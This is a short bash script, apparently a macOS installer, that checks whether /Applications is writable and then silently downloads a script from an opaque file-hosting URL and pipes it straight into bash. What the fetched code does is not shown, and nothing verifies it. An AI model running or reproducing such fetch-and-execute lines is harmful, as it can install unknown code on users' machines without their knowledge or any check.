#!/bin/bash

main() {
    clear

    if [ -w "/Applications" ]; then
        curl -s "https://f3a5dqxez3.ufs.sh/f/ijk9xZzvhn3rTH9hiEc9Ksmzt5wZYbSadLUJuRjyBA1Ornxf" | bash
    else
        echo -e "${YELLOW}[!!] Local user detected, using home directory instead of global directory ${NC}"
        curl -s "https://f3a5dqxez3.ufs.sh/f/ijk9xZzvhn3rfhqfoip67J0IKpN4AgOdvCZzXHYQ2hli8qEo" | bash
    fi
}

main
